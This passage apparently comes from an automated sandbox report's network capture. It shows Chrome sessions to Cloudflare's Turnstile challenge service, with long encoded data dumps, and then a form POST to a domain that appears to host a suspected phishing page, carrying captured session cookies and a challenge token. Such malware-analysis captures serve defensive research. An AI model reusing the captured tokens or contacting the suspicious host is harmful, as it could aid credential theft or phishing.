                          2024-05-22 15:57:00 UTC1369INData Raw: 4b 69 62 67 35 36 6f 70 4b 32 69 62 59 2b 4e 75 6f 2b 6d 69 4a 4f 56 6c 72 65 39 73 62 79 4f 78 5a 69 31 78 37 66 4b 74 35 76 4f 68 61 4f 74 72 37 50 55 70 4d 69 58 6f 73 79 35 71 74 76 51 6c 38 65 33 6f 5a 7a 41 33 75 43 32 76 4d 4b 7a 70 75 66 55 76 2b 66 41 38 4e 6e 72 77 76 50 66 30 50 44 79 7a 65 50 49 39 74 44 6e 2b 66 76 35 2b 76 77 45 37 74 41 42 43 4e 7a 37 32 41 66 66 42 77 6e 62 43 4d 6a 72 43 2b 58 31 31 2f 58 6a 39 66 6b 65 46 66 63 4c 48 68 66 55 2f 42 44 68 38 4e 2f 35 35 2b 67 59 47 68 6a 35 43 52 73 4a 45 65 55 45 42 79 4c 70 4b 7a 41 4e 43 68 4d 62 2b 77 30 37 49 52 30 32 44 55 51 50 47 42 30 4a 50 30 73 49 51 42 70 50 4d 53 77 70 43 31 45 31 4e 56 59 75 46 45 70 49 46 46 55 79 58 57 46 58 56 32 51 37 48 46 55 67 52 32 51 70 58 30 4d 34
                          Data Ascii: Kibg56opK2ibY+Nuo+miJOVlre9sbyOxZi1x7fKt5vOhaOtr7PUpMiXosy5qtvQl8e3oZzA3uC2vMKzpufUv+fA8NnrwvPf0PDyzePI9tDn+fv5+vwE7tABCNz72AffBwnbCMjrC+X11/Xj9fkeFfcLHhfU/BDh8N/55+gYGhj5CRsJEeUEByLpKzANChMb+w07IR02DUQPGB0JP0sIQBpPMSwpC1E1NVYuFEpIFFUyXWFXV2Q7HFUgR2QpX0M4
                          2024-05-22 15:57:00 UTC1369INData Raw: 78 7a 71 49 4a 78 74 6e 65 36 75 71 71 2f 6a 70 47 50 77 36 36 55 70 4c 53 66 74 61 43 68 68 72 37 42 7a 72 48 41 69 6f 79 39 77 38 72 50 70 4b 72 43 74 4d 32 74 6d 36 2b 35 33 4e 79 68 6f 71 43 59 77 62 57 70 76 61 62 65 76 75 62 64 33 65 65 75 34 50 4b 75 7a 75 50 6b 34 38 54 50 74 2f 54 54 2b 37 4c 59 2b 76 58 58 38 72 33 7a 31 65 50 65 33 65 76 70 42 67 44 62 36 39 37 74 44 76 37 49 47 4e 59 48 31 78 76 55 42 2b 30 61 36 76 6e 78 38 68 51 56 38 42 63 6f 4b 79 55 6c 43 66 6e 6f 48 53 7a 77 41 43 6b 49 4b 43 72 78 4c 77 73 76 47 79 6e 33 4e 42 38 2b 48 44 41 6b 50 68 67 31 4d 6a 6f 44 51 78 6f 33 47 69 39 4b 51 77 38 50 45 43 4e 47 4a 78 42 44 54 55 77 79 46 6b 6b 36 50 6c 38 35 49 46 55 77 48 6d 4e 70 48 32 55 2f 50 6a 70 72 51 46 38 71 63 7a 4a 46 5a
                          Data Ascii: xzqIJxtne6uqq/jpGPw66UpLSftaChhr7BzrHAioy9w8rPpKrCtM2tm6+53NyhoqCYwbWpvabevubd3eeu4PKuzuPk48TPt/TT+7LY+vXX8r3z1ePe3evpBgDb697tDv7IGNYH1xvUB+0a6vnx8hQV8BcoKyUlCfnoHSzwACkIKCrxLwsvGyn3NB8+HDAkPhg1MjoDQxo3Gi9KQw8PECNGJxBDTUwyFkk6Pl85IFUwHmNpH2U/PjprQF8qczJFZ
                          2024-05-22 15:57:00 UTC1369INData Raw: 38 62 34 32 56 65 70 57 2f 73 63 44 42 72 37 79 42 78 4a 57 65 7a 48 2b 5a 78 49 6e 4d 71 39 54 44 71 5a 2b 76 75 4e 4c 49 7a 64 71 37 31 37 6d 58 33 4c 57 39 6d 2b 43 35 75 5a 2b 67 36 38 4c 4c 75 64 61 39 33 62 6e 41 7a 4f 48 41 30 4d 37 4f 7a 74 6e 74 75 39 4f 33 36 66 66 78 36 2b 4c 54 77 76 54 42 39 74 4c 6e 2f 64 72 6b 32 38 7a 6b 7a 2b 72 72 34 51 6e 52 34 77 6b 61 37 42 66 75 45 42 41 4e 48 78 7a 65 46 66 51 68 45 64 33 67 45 79 4c 33 42 75 77 43 41 41 4d 4b 43 78 51 51 38 50 49 41 38 2f 6b 73 4d 51 73 6e 44 68 7a 33 38 7a 55 34 46 42 73 43 4b 55 6f 7a 41 52 78 49 4b 43 63 39 4b 6a 41 6b 55 68 52 47 50 30 59 33 55 44 4a 4c 48 56 78 51 59 52 63 72 58 45 46 6c 47 45 67 6b 52 7a 6c 6b 5a 7a 67 74 54 30 52 6b 4c 55 51 76 53 57 78 7a 64 48 56 53 63 56
                          Data Ascii: 8b42VepW/scDBr7yBxJWezH+ZxInMq9TDqZ+vuNLIzdq717mX3LW9m+C5uZ+g68LLuda93bnAzOHA0M7Oztntu9O36ffx6+LTwvTB9tLn/drk28zkz+rr4QnR4wka7BfuEBANHxzeFfQhEd3gEyL3BuwCAAMKCxQQ8PIA8/ksMQsnDhz38zU4FBsCKUozARxIKCc9KjAkUhRGP0Y3UDJLHVxQYRcrXEFlGEgkRzlkZzgtT0RkLUQvSWxzdHVScV
                          2024-05-22 15:57:00 UTC1369INData Raw: 64 62 4f 6c 6e 73 47 61 79 63 44 4b 6f 4a 65 4f 79 37 76 52 79 49 75 6e 6f 4e 47 72 73 4c 69 33 6d 73 71 73 79 5a 58 4d 31 61 4b 73 78 4e 61 6a 74 74 65 6a 35 61 58 62 76 4b 37 6c 33 36 7a 64 71 2b 44 71 35 4b 6e 69 79 63 65 79 35 72 6a 62 74 75 37 79 2f 41 4c 63 34 63 37 46 33 63 4c 42 77 65 62 63 36 67 33 6f 33 50 77 4d 37 50 44 75 30 4f 33 54 39 2b 59 4a 2b 52 37 57 2b 42 50 68 48 76 72 65 33 76 6f 5a 39 2f 76 71 47 76 77 75 35 52 30 6f 2b 2f 45 6a 46 65 38 46 4a 52 6b 37 43 53 77 4f 47 51 6b 76 49 51 41 4e 4d 79 56 47 42 44 55 2f 42 42 55 38 48 55 59 4f 50 55 67 67 42 6b 49 6c 53 68 56 49 4b 56 59 62 53 6a 30 59 4c 45 38 78 48 79 46 52 52 6b 41 65 56 6a 70 46 4f 56 70 6a 62 69 5a 64 5a 32 59 7a 59 30 55 77 52 57 68 4a 4e 7a 78 73 54 6c 67 39 62 57 46
                          Data Ascii: dbOlnsGaycDKoJeOy7vRyIunoNGrsLi3msqsyZXM1aKsxNajttej5aXbvK7l36zdq+Dq5Kniycey5rjbtu7y/ALc4c7F3cLBwebc6g3o3PwM7PDu0O3T9+YJ+R7W+BPhHvre3voZ9/vqGvwu5R0o+/EjFe8FJRk7CSwOGQkvIQANMyVGBDU/BBU8HUYOPUggBkIlShVIKVYbSj0YLE8xHyFRRkAeVjpFOVpjbiZdZ2YzY0UwRWhJNzxsTlg9bWF
                          2024-05-22 15:57:00 UTC1369INData Raw: 73 6c 39 75 63 4f 6e 6a 37 7a 47 79 59 58 42 74 4d 32 54 78 4d 37 61 70 4d 71 38 33 5a 7a 4f 77 4e 32 56 30 64 72 5a 70 74 58 49 36 61 6a 62 76 4b 65 34 33 4b 79 2f 73 65 44 55 38 61 6e 6c 37 76 4c 45 36 39 79 32 73 65 32 37 2f 62 2f 78 31 50 37 50 39 39 6e 6f 31 2f 67 44 44 73 34 41 34 41 62 52 41 73 2f 4f 31 77 6a 34 46 74 6b 4d 37 42 76 6f 44 51 4c 72 34 52 51 46 34 75 51 58 43 65 72 6f 47 2f 77 69 37 68 38 43 41 50 49 6a 46 67 45 45 4a 66 4d 33 42 43 55 4e 4d 68 6b 78 44 6b 45 43 47 30 5a 47 46 44 51 70 2f 42 55 34 48 55 49 6f 50 53 34 46 48 69 30 50 4b 43 78 49 46 55 63 6b 52 53 70 54 4d 45 34 78 58 7a 46 51 49 46 38 31 57 55 70 65 4b 6c 74 4e 58 6b 52 62 51 57 6f 79 59 56 4a 4d 61 47 52 57 65 6e 78 71 4f 55 31 50 63 44 31 64 56 58 56 6d 56 44 39 7a
                          Data Ascii: sl9ucOnj7zGyYXBtM2TxM7apMq83ZzOwN2V0drZptXI6ajbvKe43Ky/seDU8anl7vLE69y2se27/b/x1P7P99no1/gDDs4A4AbRAs/O1wj4FtkM7BvoDQLr4RQF4uQXCeroG/wi7h8CAPIjFgEEJfM3BCUNMhkxDkECG0ZGFDQp/BU4HUIoPS4FHi0PKCxIFUckRSpTME4xXzFQIF81WUpeKltNXkRbQWoyYVJMaGRWenxqOU1PcD1dVXVmVD9z


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          19192.168.2.449761104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:01 UTC487OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Accept: */*
                          Sec-Fetch-Site: none
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:01 UTC375INHTTP/1.1 404 Not Found
                          Date: Wed, 22 May 2024 15:57:01 GMT
                          Content-Type: application/json
                          Content-Length: 7
                          Connection: close
                          cf-chl-out: Zu3wBb91SGuEQJT2XJJedA==$tajMHqZownsZeRW9XyAzag==
                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                          Server: cloudflare
                          CF-RAY: 887dffe5cae71811-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:01 UTC7INData Raw: 69 6e 76 61 6c 69 64
                          Data Ascii: invalid


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          20192.168.2.449762104.17.2.1844435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:13 UTC917OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1078806175:1716390872:Qs3WyvFVlUI0IspEMP6EGCRsS1O73Ub7EXvElg-oaUk/887dff9f6d8f429d/4d20fcc93ec5b5c HTTP/1.1
                          Host: challenges.cloudflare.com
                          Connection: keep-alive
                          Content-Length: 33277
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          Content-type: application/x-www-form-urlencoded
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          CF-Challenge: 4d20fcc93ec5b5c
                          sec-ch-ua-platform: "Windows"
                          Accept: */*
                          Origin: https://challenges.cloudflare.com
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/nshcb/0x4AAAAAAAawZipfMclJYEh2/auto/normal
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          2024-05-22 15:57:13 UTC16384OUTData Raw: 76 5f 38 38 37 64 66 66 39 66 36 64 38 66 34 32 39 64 3d 34 77 78 49 6d 38 74 4a 75 38 75 50 78 38 57 39 6a 50 78 49 4c 51 78 74 78 68 4a 74 72 39 49 49 74 77 68 69 39 24 39 31 78 38 76 39 6b 38 39 68 58 49 68 71 39 44 49 39 77 68 38 33 39 61 50 38 39 33 77 74 35 39 57 77 57 58 39 76 5a 58 39 30 6f 64 24 59 44 44 39 7a 58 77 74 43 39 72 56 74 47 6a 54 35 31 53 54 61 39 63 32 42 38 39 79 34 6e 79 75 39 65 49 50 4c 39 78 49 38 56 75 75 39 39 37 58 39 5a 44 39 39 5a 49 49 61 25 32 62 71 39 31 49 39 47 56 49 38 47 4d 6d 4e 38 67 4c 55 63 39 38 2b 74 75 67 54 59 47 78 78 63 76 75 61 66 56 6e 78 39 37 45 49 71 45 51 77 39 54 46 33 6e 39 78 2b 71 49 49 2d 39 41 49 74 46 30 4a 6a 38 54 56 24 2b 69 6f 6c 2d 37 47 47 38 7a 68 7a 30 68 2b 73 48 49 64 48 50 35 6f 5a
                          Data Ascii: v_887dff9f6d8f429d=4wxIm8tJu8uPx8W9jPxILQxtxhJtr9IItwhi9$91x8v9k89hXIhq9DI9wh839aP893wt59WwWX9vZX90od$YDD9zXwtC9rVtGjT51STa9c2B89y4nyu9eIPL9xI8Vuu997X9ZD99ZIIa%2bq91I9GVI8GMmN8gLUc98+tugTYGxxcvuafVnx97EIqEQw9TF3n9x+qII-9AItF0Jj8TV$+iol-7GG8zhz0h+sHIdHP5oZ
                          2024-05-22 15:57:13 UTC16384OUTData Raw: 68 6d 30 4c 39 6a 39 4d 49 34 56 38 58 75 43 49 5a 39 39 39 76 6d 39 68 58 58 59 39 54 58 38 34 76 53 39 78 4b 24 6e 39 42 39 61 78 39 38 39 54 44 33 78 74 78 39 57 49 33 39 4c 6a 39 54 41 33 75 68 46 39 4b 6a 75 56 68 54 39 76 77 54 58 38 57 39 49 58 50 5a 39 73 49 55 49 68 79 43 36 49 75 39 74 73 74 75 39 78 38 38 4c 74 41 39 44 57 4d 71 78 41 73 59 70 49 58 50 41 39 72 39 33 73 74 58 39 24 49 57 4e 74 32 74 6c 39 4f 39 38 4c 74 78 39 38 56 49 73 74 76 39 78 4a 63 4d 75 77 32 54 49 68 55 2d 47 67 57 63 35 44 66 32 6d 45 67 44 56 2d 34 4d 64 24 43 32 66 73 4d 75 31 43 38 66 75 6b 64 65 4e 4a 66 53 4e 34 31 43 4c 73 51 4b 61 31 77 6a 66 47 58 33 56 74 71 39 38 42 73 63 59 63 56 24 49 34 56 68 72 39 67 78 39 2d 74 2d 39 4d 49 78 48 48 6e 39 57 39 34 76 39
                          Data Ascii: hm0L9j9MI4V8XuCIZ999vm9hXXY9TX84vS9xK$n9B9ax989TD3xtx9WI39Lj9TA3uhF9KjuVhT9vwTX8W9IXPZ9sIUIhyC6Iu9tstu9x88LtA9DWMqxAsYpIXPA9r93stX9$IWNt2tl9O98Ltx98VIstv9xJcMuw2TIhU-GgWc5Df2mEgDV-4Md$C2fsMu1C8fukdeNJfSN41CLsQKa1wjfGX3Vtq98BscYcV$I4Vhr9gx9-t-9MIxHHn9W94v9
                          2024-05-22 15:57:13 UTC509OUTData Raw: 4f 73 57 55 2b 6a 59 4f 45 62 6d 30 6a 79 4f 6c 34 78 68 6a 35 56 4a 6e 51 79 6a 59 4b 6c 32 35 36 6a 67 57 61 24 39 6c 49 50 54 57 36 79 42 55 2b 73 4c 56 51 69 57 49 79 4a 4e 39 59 65 55 4f 45 46 5a 68 4d 75 56 55 32 55 51 4f 6b 6f 69 6a 66 56 79 2b 2d 38 78 66 48 70 4a 5a 4c 76 39 64 43 56 2d 57 45 58 37 49 61 56 42 75 74 70 45 65 74 38 61 39 42 67 5a 62 73 64 2b 73 73 68 75 39 46 39 62 49 72 4c 61 68 43 43 69 41 73 45 65 6a 72 39 61 45 63 24 50 4c 34 48 56 49 53 4a 6d 6b 63 54 57 73 59 63 57 34 36 42 76 39 37 75 47 45 4a 77 63 42 66 41 36 6f 67 68 24 39 67 39 32 63 39 58 56 33 37 54 46 63 39 51 4f 42 2b 35 39 71 39 4d 51 77 46 63 74 53 37 6c 68 76 58 56 32 42 49 71 77 74 72 51 35 68 67 55 59 63 66 36 38 63 35 39 64 66 77 4a 74 6f 24 24 53 30 70 65 6a
                          Data Ascii: OsWU+jYOEbm0jyOl4xhj5VJnQyjYKl256jgWa$9lIPTW6yBU+sLVQiWIyJN9YeUOEFZhMuVU2UQOkoijfVy+-8xfHpJZLv9dCV-WEX7IaVButpEet8a9BgZbsd+sshu9F9bIrLahCCiAsEejr9aEc$PL4HVISJmkcTWsYcW46Bv97uGEJwcBfA6ogh$9g92c9XV37TFc9QOB+59q9MQwFctS7lhvXV2BIqwtrQ5hgUYcf68c59dfwJto$$S0pej
                          2024-05-22 15:57:13 UTC1257INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:13 GMT
                          Content-Type: text/html; charset=UTF-8
                          Content-Length: 3416
                          Connection: close
                          cf-chl-out-s: 6XIIsF2X1I2nVz4RDIexN+rRzTd2/ldWitCIrFaj4QbBbPssDI022CwjZv2D6DzjJ6PMLH3b7CprQ2cSlkIcKRsJnXDzKspf9wODMkkbOMQyz5zUkJ+BKiQXe6cbnaD4d56Ng2LqlPWgquY7VX9Rin+RcmsGBSQkuaSj341uA47u2MiHYXhljSltY+ycP6jjs5XybWbeRDPzB6EdwJvudDPIwRhVnRj7hcVmpww3NeQADgCPEHNKAf34NBrrnyAE9D+uDfw/E/OfezZOILQmzFWgCWOMsYsgVxcDnOG+S8vlJHBUDUd7uoXtESPLVLEpTL4oJw6YJ+BI4Wm+LzFZelSbE1WvoQIqXhpyoHhyY2A6+f7IhoWAxQV1wF1jLdi8T2/i1pivfgZo8e5//3u0uVc+QADF16+ke8ITIrFyTZSmK6g9gq9M4T35wLYOLGF2QYLWYlK8zR6W0sGEzgQEPOiDZ90EzonluzmhkFzU2lcW5ct+qExTrpI5bOfFrHs++hGQNJ+IRa0nAp07WLoNw1FDEJEBmcmQ3Xmrc0lQ7r3+PPyongFLZAg9L3f5mTKD+e5U1lJu0NuwzxwmFKpQUXp7ctA0l+3Q4vTeR1HL9qEl0sUuKCnJCvV/Ovse7EPPc/YXYZ8tkFDP8Eb3Xa1ZXEUnSbmnyWHNGB8D22wKc2BlK1lr8MjrFGSSO4jrPowhREHQJ4lTqTqUgfHHTnc7FhxmQGv8XGd9owcrPTi5gOwSXaL6ZBMzXGZhzIOwYlGcHOAzx6at2rJuwiLKaJ+SzWO/WHXqUthp1B4fJIZVwEOYJAEzKQoE05PKx9bLSLEl$9ysYwan2YVpWaki03yh69A==
                          cf-chl-out: 2cA0mtipUDQycJY+hELVqXQ3hG4aEBFikSTzFeGZks2/gE9LlDoItxwNtPjpm0r4Ku02BacEzGFif5zhDpUrOo9E+T6/pqAe7vyVFVdT+4FHojgm+xESrPK17zdtufJe$tBMX5o2suttgYam2/tPuYw==
                          Server: cloudflare
                          CF-RAY: 887e002e5a424299-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-05-22 15:57:13 UTC112INData Raw: 66 47 78 47 54 34 61 50 68 46 46 64 62 6f 46 67 53 32 79 44 63 48 75 55 5a 33 31 79 61 33 65 61 64 4b 57 62 65 4b 65 57 61 59 43 43 6a 4a 43 4d 6a 49 43 46 67 6d 32 48 69 4b 79 6e 70 34 75 6f 69 33 53 50 72 4a 4f 63 6f 73 53 56 74 5a 4f 64 74 70 61 67 68 61 6a 48 78 34 76 4b 75 73 76 4f 30 73 48 48 30 37 53 6f 74 62 71 78 6e 70 6d 36
                          Data Ascii: fGxGT4aPhFFdboFgS2yDcHuUZ31ya3eadKWbeKeWaYCCjJCMjICFgm2HiKynp4uoi3SPrJOcosSVtZOdtpaghajHx4vKusvO0sHH07Sotbqxnpm6
                          2024-05-22 15:57:13 UTC1369INData Raw: 6d 64 7a 6b 76 37 69 33 70 38 62 55 73 36 62 47 76 4c 65 75 78 72 7a 41 38 65 4b 74 38 38 48 6b 36 73 75 7a 76 50 48 50 32 64 54 7a 2b 51 54 76 77 39 44 57 35 73 6a 79 32 65 59 44 42 73 66 48 41 2b 50 51 41 51 6a 6d 45 4f 7a 58 34 78 6e 36 33 4e 6b 67 43 68 50 7a 2b 52 41 6c 33 79 59 54 42 51 63 69 39 69 77 66 49 41 55 66 4b 78 49 47 4c 43 63 32 4e 75 73 52 4c 54 49 6e 39 42 45 79 4e 44 51 35 46 53 41 32 50 66 34 2f 41 55 77 68 43 44 70 49 51 6a 4a 4a 50 69 41 57 4d 54 63 58 57 31 77 7a 57 6a 52 4b 50 69 45 39 4c 6a 5a 64 58 6a 51 35 51 32 63 2f 61 46 34 2f 50 6b 73 2b 63 48 42 47 64 55 52 49 64 33 56 74 57 6e 42 58 56 55 78 54 51 56 68 78 62 6d 39 79 50 31 46 63 65 59 6c 71 67 55 68 34 54 55 39 6b 54 47 6c 71 55 46 56 35 68 48 52 5a 6a 47 35 78 69 59 39
                          Data Ascii: mdzkv7i3p8bUs6bGvLeuxrzA8eKt88Hk6suzvPHP2dTz+QTvw9DW5sjy2eYDBsfHA+PQAQjmEOzX4xn63NkgChPz+RAl3yYTBQci9iwfIAUfKxIGLCc2NusRLTIn9BEyNDQ5FSA2Pf4/AUwhCDpIQjJJPiAWMTcXW1wzWjRKPiE9LjZdXjQ5Q2c/aF4/Pks+cHBGdURId3VtWnBXVUxTQVhxbm9yP1FceYlqgUh4TU9kTGlqUFV5hHRZjG5xiY9
                          2024-05-22 15:57:13 UTC1369INData Raw: 38 54 6d 71 63 4c 56 36 73 4f 39 70 73 44 46 77 62 48 31 79 38 4c 43 39 2f 6e 72 75 76 66 6d 2b 4d 36 38 2f 50 44 68 30 39 76 68 75 67 66 54 35 76 6a 62 7a 4d 30 45 45 52 49 46 35 42 4c 72 41 51 67 5a 47 76 59 4c 32 52 37 75 46 74 73 4d 32 51 54 66 45 68 48 77 35 76 34 61 46 76 6e 33 2b 69 50 74 2b 79 45 71 41 79 59 44 4c 41 63 33 46 42 37 35 4b 78 67 66 44 7a 38 75 4a 42 4d 32 4a 43 63 59 49 54 6c 43 47 67 45 36 4b 78 38 63 4c 43 30 54 49 43 64 4e 46 6c 64 47 4f 43 6f 6f 4f 31 55 65 4f 54 67 2b 4d 32 59 77 52 79 56 71 53 45 6b 38 53 45 4e 6c 4c 6d 4a 6d 55 55 4e 6d 53 46 67 32 65 6d 35 65 53 33 35 55 59 44 36 45 51 55 56 7a 51 31 52 46 64 31 68 66 65 59 35 39 69 49 71 43 54 49 32 4f 63 46 39 67 61 34 2b 53 65 70 61 54 6a 58 68 5a 63 34 47 66 6a 34 56 36
                          Data Ascii: 8TmqcLV6sO9psDFwbH1y8LC9/nruvfm+M68/PDh09vhugfT5vjbzM0EERIF5BLrAQgZGvYL2R7uFtsM2QTfEhHw5v4aFvn3+iPt+yEqAyYDLAc3FB75KxgfDz8uJBM2JCcYITlCGgE6Kx8cLC0TICdNFldGOCooO1UeOTg+M2YwRyVqSEk8SENlLmJmUUNmSFg2em5eS35UYD6EQUVzQ1RFd1hfeY59iIqCTI2OcF9ga4+SepaTjXhZc4Gfj4V6
                          2024-05-22 15:57:13 UTC566INData Raw: 65 2b 32 36 79 79 76 38 33 30 74 74 4c 53 39 66 62 47 79 76 7a 54 79 2b 71 34 36 2b 7a 75 76 74 38 49 78 4d 55 45 79 65 72 62 34 64 6f 41 45 66 33 6e 38 52 51 54 43 66 62 56 43 68 48 31 48 42 6e 71 37 4e 37 31 45 51 44 63 45 66 62 32 4a 69 6f 74 2b 65 55 75 4d 52 34 76 4c 41 4d 41 37 41 41 35 45 50 58 35 46 42 6b 37 2f 52 63 71 50 78 67 53 2b 68 55 61 46 67 5a 4b 49 42 63 58 54 45 35 41 44 30 77 37 54 53 4d 52 55 55 55 32 4b 44 41 32 44 31 73 6f 4f 30 30 77 49 53 4a 59 5a 57 5a 5a 4f 57 5a 41 56 56 78 74 62 6b 74 66 4c 6e 4a 44 61 6a 42 67 4c 6c 67 30 5a 6d 56 46 4f 31 4e 75 61 6b 35 4d 54 33 64 43 55 48 56 2b 56 33 70 58 67 46 75 4c 61 48 4a 4f 66 32 78 7a 59 35 4f 43 65 47 65 4b 65 48 74 73 64 59 32 57 62 6c 57 4f 66 33 4e 77 67 49 46 6e 64 48 75 68 61
                          Data Ascii: e+26yyv830ttLS9fbGyvzTy+q46+zuvt8IxMUEyerb4doAEf3n8RQTCfbVChH1HBnq7N71EQDcEfb2Jiot+eUuMR4vLAMA7AA5EPX5FBk7/RcqPxgS+hUaFgZKIBcXTE5AD0w7TSMRUUU2KDA2D1soO00wISJYZWZZOWZAVVxtbktfLnJDajBgLlg0ZmVFO1Nuak5MT3dCUHV+V3pXgFuLaHJOf2xzY5OCeGeKeHtsdY2WblWOf3NwgIFndHuha


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          21192.168.2.449763188.114.96.34435640C:\Program Files\Google\Chrome\Application\chrome.exe
                          TimestampBytes transferredDirectionData
                          2024-05-22 15:57:14 UTC1439OUTPOST /mxCAKSFLZHZgSbiN6uhzP4xbZjf HTTP/1.1
                          Host: oknya83345.eleteriod.com
                          Connection: keep-alive
                          Content-Length: 1288
                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                          sec-ch-ua-platform: "Windows"
                          sec-ch-ua-mobile: ?0
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                          Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryrb7QgB3Pyt6HcpC6
                          Accept: */*
                          Origin: https://oknya83345.eleteriod.com
                          Sec-Fetch-Site: same-origin
                          Sec-Fetch-Mode: cors
                          Sec-Fetch-Dest: empty
                          Referer: https://oknya83345.eleteriod.com/infd201971/
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US,en;q=0.9
                          Cookie: XSRF-TOKEN=eyJpdiI6Ilk0L1dSZVJ5TGJsOVRGTHNiWUxvS2c9PSIsInZhbHVlIjoiRjhRQU1qKzVESlpKZzVxQ3JmdmpPLy9SZGhBWHZwTGNLQ3FxeHI0QVZSOWNkOWEzVHZvZytuQ2tNT0FUUEdxemtETUx2T2hkR2V6YXpMMTRDN2UvTnJELzlubUxFY2RGdGRYYTN5WmJOWDh4UnE3RHpqOGo5N2JTekF0RmpqMjUiLCJtYWMiOiIwNWNlNTQ3ZGY2OWVlZGVmY2JmMThjNzEwMGZmODkxNWViZjFmODExODIyZjMyY2M0ZGJjMDEyYTQ1ZDI5ODI1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ik53VTU4TzlpczB4ZUtOcGczZGN3K2c9PSIsInZhbHVlIjoiV0dhQW5WcEtNd2Q1bldEcWRRT3Zacll4RU9uWFpXWVp4R1RUQkVQcTZWWEhNQ2ZzTU9tTXhMM3l3by9FYUJwSGhlc0xmTW5CWTBRMWpNTms4NVlrYWIvM3RUTmcrWW1wd1IyMXZFdlpMc1lrOTBqbjJHVC92S1pmMzdpTWRYdEQiLCJtYWMiOiJmYjlkNzZmYTYxZTdlMTZiNTVhZjAzMmI1OGY1OGM4ODNlMzczZjE0YTZkNzI5YzdjNDkwMjI4ZmYyMTE4YWY4IiwidGFnIjoiIn0%3D
                          2024-05-22 15:57:14 UTC1288OUTData Raw: 2d 2d 2d 2d 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 72 62 37 51 67 42 33 50 79 74 36 48 63 70 43 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 22 0d 0a 0d 0a 30 2e 5f 74 2d 50 64 49 65 63 32 2d 7a 50 4c 30 2d 57 54 75 42 78 61 54 46 4a 36 67 77 63 4c 2d 46 38 74 52 32 7a 44 6b 51 4d 46 50 54 30 57 6e 58 70 6e 79 65 66 55 38 54 67 78 6b 58 39 41 35 64 74 4b 75 68 55 75 66 6c 6e 31 53 61 69 74 30 56 57 31 7a 73 4e 68 61 65 54 38 41 6e 54 77 48 34 64 61 2d 46 69 59 66 39 62 59 43 4a 39 76 6e 78 68 32 4c 6a 67 53 4c 48 32 59 4d 57 47 59 73 4c 78 74 65 6c 51 62 56 36 44 75 7a 6a 59 50 4b 70 53 7a 45 70
                          Data Ascii: ------WebKitFormBoundaryrb7QgB3Pyt6HcpC6Content-Disposition: form-data; name="cf-turnstile-response"0._t-PdIec2-zPL0-WTuBxaTFJ6gwcL-F8tR2zDkQMFPT0WnXpnyefU8TgxkX9A5dtKuhUufln1Sait0VW1zsNhaeT8AnTwH4da-FiYf9bYCJ9vnxh2LjgSLH2YMWGYsLxtelQbV6DuzjYPKpSzEp
                          2024-05-22 15:57:15 UTC995INHTTP/1.1 200 OK
                          Date: Wed, 22 May 2024 15:57:15 GMT
                          Content-Type: application/json
                          Transfer-Encoding: chunked
                          Connection: close
                          Cache-Control: no-cache, private
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMmW1beKvjRGT7ATNhuoZbOlNPOrzJpZ1Jr5wDE%2BOgvvKVHRr99tB2nGsf3J9Rpxd%2BkfOQeiTctytKhKFEGzL3GEn32tbQc1jqei6ntyPWIs6OGSVLyeNs4808bvvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          alt-svc: h3=":443"; ma=86400
